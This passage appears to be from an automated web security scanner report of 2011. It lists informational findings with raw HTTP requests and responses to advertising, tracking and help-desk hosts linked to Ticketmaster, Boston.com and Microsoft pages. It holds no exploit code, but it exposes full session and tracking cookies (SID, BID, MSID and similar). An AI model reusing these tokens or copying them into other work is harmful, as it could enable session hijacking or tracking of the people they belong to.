Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEORAN=1; SID=Y3dq6VJOUobgvd5jFa2adifFsjQPEDu1SwQqHaI3I3ywZ2h_RqrBBbchAambLEYToFNp0jdvZxmi9vEG; BID=MN5k2Ii01e9c8eT9zIsTZrTP8tnmzVQDkHCqfm3pQgSOOVA96YtvgyxM-HQGO_XI68l_ZoGoHFIlKwiEeN9v; NPDMA=238; NGUserID=a4b2480-32187-970230788-20; __cs_rr=1; GEO_OMN=ba; NDMA=238; LANGUAGE=en-us; foresee.alive=1311100561797; s_pers=%20gpv1%3DTM_US%253A%2520EDP%253A%2520Box%2520Classic%253A%2520On%2520Sale%7C1311102362932%3B%20s_vs%3D1%7C1311102362935%3B%20gpv%3DTM_US%253A%2520EDP%253A%2520Box%2520Classic%253A%2520On%2520Sale%7C1311102362989%3B%20s_vnum%3D1313692562997%2526vn%253D1%7C1313692562997%3B%20s_invisit%3Dtrue%7C1311102362997%3B; s_sess=%20cpcbrate%3D1%3B%20currentEventList%3D%253B000043582C516D43%3B%20s_cc%3Dtrue%3B%20s_ria%3Dflash%252010%257C%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:29 GMT
Server: Apache
AdServer: svr2.ads.ash3.clisys.tmcs:9691:1
P3P: policyref="http://ads.as4x.tmcs.net/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM", policyref="http://ads.as4x.tmcs.net/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Pragma: no-cache
Content-Length: 1644
Connection: close
Content-Type: text/html

<html><head></head><body>
<script type="text/javascript">
<!--
function create_zap_iframe() {

var zap_url='//b3.mookie1.com/2/ticketmaster/ZAP/1@x01?';
var frame=document.createElement('iframe');
fra
...[SNIP]...

28.3. http://asset0.zendesk.com/external/zenbox/v2.1/loading.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://asset0.zendesk.com
Path:	/external/zenbox/v2.1/loading.html

Request

GET /external/zenbox/v2.1/loading.html HTTP/1.1
Host: asset0.zendesk.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mavitunasecurity.com/

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 19 Jul 2011 15:38:25 GMT
Content-Type: text/html
Last-Modified: Mon, 23 May 2011 20:57:52 GMT
Connection: keep-alive
Content-Length: 631

<!DOCTYPE html>
<html lang='en-US'>
<head>
<title>Zendesk Dropbox Loading...</title>
<meta charset="UTF-8">
<style>
body {
margin: 0;
padding: 0;
}
.wra
...[SNIP]...

28.4. http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3

Request

GET /2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:43 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 319
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Ticketmaster/LN/RTG_SX_NonSecure/1636527550/Bottom3/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG SRC="http:/
...[SNIP]...

28.5. http://b3.mookie1.com/2/ticketmaster/172548/11408426983@x01 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/172548/11408426983@x01

Request

Response

28.6. http://b3.mookie1.com/2/ticketmaster/AirCanadaCentre/11408426983@x01 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/AirCanadaCentre/11408426983@x01

Request

Response

28.7. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/ZAP/1@x01

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:42 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38382
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...

28.8. http://b3.mookie1.com/2/ticketmaster/minorcat/1/11408426983@x02 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/minorcat/1/11408426983@x02

Request

Response

28.9. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1627503762@x96 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/zzzSample/wwww.themig.com/1627503762@x96

Request

GET /2/zzzSample/wwww.themig.com/1627503762@x96?&XE&Page=HomeMedia%20Innovation%20Group%20-%20Contact%20Us&tax23_RefDocLoc=http://www.fakereferrerdominator.com/referrerPathName&if_nt_CookieAccept=Y&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/contact.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; s_cc=true; s_sq=%5B%5BB%5D%5D; session=1311100939|1311100939

Response

28.10. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1936689153@x96 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/zzzSample/wwww.themig.com/1936689153@x96

Request

GET /2/zzzSample/wwww.themig.com/1936689153@x96?&XE&Page=HomeMedia%20Innovation%20Group%20-%20Home&tax23_RefDocLoc=http://www.fakereferrerdominator.com/referrerPathName&if_nt_CookieAccept=Y&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/home.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

28.11. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1@x96 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/zzzSample/wwww.themig.com/1@x96

Request

GET /2/zzzSample/wwww.themig.com/1@x96?&XE&Site=TheMig.com&Section=we&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/home.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660

Response

28.12. http://corporate.everydayhealth.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corporate.everydayhealth.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: corporate.everydayhealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: SL_Audience=210|Accelerated|203|1|0; __utmz=104244948.1305642699.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/30; s_vi=[CS]v1|26E943688507A615-6000010160003977[CE]; .ASPXANONYMOUS=Acx84xcyPgZjNzU4YjAwZS05NzBkLTQ1MTctYWIyNy03MWNiM2NhYTlmM2I1; __utma=104244948.1964776954.1305642699.1305642699.1305642699.1

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server-ID: : USNJWWEB02
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 20:20:13 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

28.13. http://creatives.as4x.tmcs.net/tmsandbox3a.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creatives.as4x.tmcs.net
Path:	/tmsandbox3a.html

Request

GET /tmsandbox3a.html?site=tm&adsize=176x200&handle=N&pagepos=580&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&brand=0&eventid=000043582C516D43 HTTP/1.1
Host: creatives.as4x.tmcs.net
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
P3P: policyref="http://ads.as4x.tmcs.net/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 19 Jul 2011 18:36:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 19 Jul 2011 18:36:27 GMT
Content-Length: 923
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style type="text/css">
<!-
...[SNIP]...

28.14. http://i3.onlinehelp.microsoft.com/areas/onlinehelp/content/styles/bing/OnlineHelp_GC.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i3.onlinehelp.microsoft.com
Path:	/areas/onlinehelp/content/styles/bing/OnlineHelp_GC.css

Request

GET /areas/onlinehelp/content/styles/bing/OnlineHelp_GC.css HTTP/1.1
Host: i3.onlinehelp.microsoft.com
Proxy-Connection: keep-alive
Referer: http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311008316522:ss=1311004920058

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Cteonnt-Length: 103
Content-Length: 103
Date: Tue, 19 Jul 2011 15:16:07 GMT
Connection: close
Vary: Accept-Encoding

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

28.15. http://majornelson.com/favicon.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://majornelson.com
Path:	/favicon.png

Request

GET /favicon.png HTTP/1.1
Host: majornelson.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=231963907.777545616.1311118951.1311118951.1311118951.1; __utmb=231963907.1.10.1311118951; __utmc=231963907; __utmz=231963907.1311118951.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Tue, 19 Jul 2011 23:44:31 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 169

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.65</center>
</body>
</html>

28.16. http://now.eloqua.com/visitor/v200/svrGP.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://now.eloqua.com
Path:	/visitor/v200/svrGP.aspx

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=1092&ref2=elqNone&tzo=360&ms=309 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://www.rallydev.com/agile_products/editions/community/signup/?ppc=google&kw=bug_tracking&gclid=CMWl_YzNjaoCFYpd5Qodq3Z4og
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=3FED00B3830C43E6A35A88AB0C1B4136; ELQSTATUS=OK; __utmz=16459234.1306359787.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=2150246959903343989; __utma=16459234.18880641.1306359787.1306377949.1306389346.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Tue, 19 Jul 2011 14:20:41 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

28.17. http://odb.outbrain.com/utils/ping.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://odb.outbrain.com
Path:	/utils/ping.html

Request

GET /utils/ping.html?random=0.18964302926735044 HTTP/1.1
Host: odb.outbrain.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: obuid=34e83892-8848-4a54-a4d4-8bdbba750320; _lvs2="1tAU7QKQIVo="; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Accept-Ranges: bytes
ETag: W/"158-1311068672000"
Last-Modified: Tue, 19 Jul 2011 09:44:32 GMT
Content-Type: text/html
Content-Length: 158
Date: Tue, 19 Jul 2011 20:44:13 GMT

<html>
   <head>
       <META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
       <META HTTP-EQUIV="Pragma" CONTENT="no-cache">
   </head>
   <body>
   </body>
</html>

28.18. http://tag.admeld.com/ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216

Request

GET /ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216?t=1311108279704&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: tag.admeld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: meld_sess=22e7a59d-553a-4d2e-a8a1-6434f26cd599; __qca=P0-1593807240-1305111258024; D41U=3jJQGUe0Mr1_sOR6QlbZNwyD3LjZHCydqkKN1RXQ0AEdL95ZdcIpbDw

Response

28.19. http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228

Request

GET /ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: tag.admeld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: meld_sess=22e7a59d-553a-4d2e-a8a1-6434f26cd599; __qca=P0-1593807240-1305111258024; D41U=3jJQGUe0Mr1_sOR6QlbZNwyD3LjZHCydqkKN1RXQ0AEdL95ZdcIpbDw

Response

28.20. http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606228 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606228

Request

GET /ad/iframe/610/bostonglobe/728x90/bg_1064637_61606228?t=1311108254581&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: tag.admeld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: meld_sess=22e7a59d-553a-4d2e-a8a1-6434f26cd599; __qca=P0-1593807240-1305111258024; D41U=3jJQGUe0Mr1_sOR6QlbZNwyD3LjZHCydqkKN1RXQ0AEdL95ZdcIpbDw

Response

28.21. http://tm-web2.rondavu.com/com/rondavu/wt/module/static/rondavu_remote.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tm-web2.rondavu.com
Path:	/com/rondavu/wt/module/static/rondavu_remote.html

Request

GET /com/rondavu/wt/module/static/rondavu_remote.html?rondavu_remote=1&xdm_e=http://www.ticketmaster.com&xdm_c=default0&xdm_p=1 HTTP/1.1
Host: tm-web2.rondavu.com
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=3600,public
Content-Type: text/html
Date: Tue, 19 Jul 2011 18:39:38 GMT
Last-Modified: Mon, 23 May 2011 22:07:42 GMT
Server: Rondavu
Content-Length: 630
Connection: keep-alive

<!DOCTYPE html>
<html><head><title>Rondavu remote</title>

<script type="text/javascript">
var rondavu_js_url = window.location.hash.substr(1);
document.write('<'+'script src="' + rondavu_js_u
...[SNIP]...

28.22. http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route previous next

Summary

Severity:	Information
Confidence:	Certain
